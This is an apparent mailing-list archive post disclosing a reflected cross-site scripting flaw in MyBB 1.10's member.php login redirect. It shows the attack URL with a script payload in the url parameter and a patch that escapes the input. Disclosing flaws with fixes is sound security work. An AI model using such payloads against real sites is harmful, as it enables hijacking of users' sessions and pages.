MyBB 1.10 New CrossSiteScripting ' member.php '

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 

//-- MyBB 1.10 New CrossSiteScripting ' member.php ' --//

Webattack :-
	/mybb/member.php?action=do_login&username=[usrname]&password=[pass]&url="><script>alert(1);</script>

//-- FixIT --//

	Open member.php
    GoTo Line :- 1030 ..


        if($mybb->input['url'])
			{
				redirect($mybb->input['url'], $lang->redirect_loggedin);
			}


        Replace It With

   		if($mybb->input['url'])
			{
		redirect(htmlspecialchars($mybb->input['url']), $lang->redirect_loggedin);
   			}
//-- --//
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux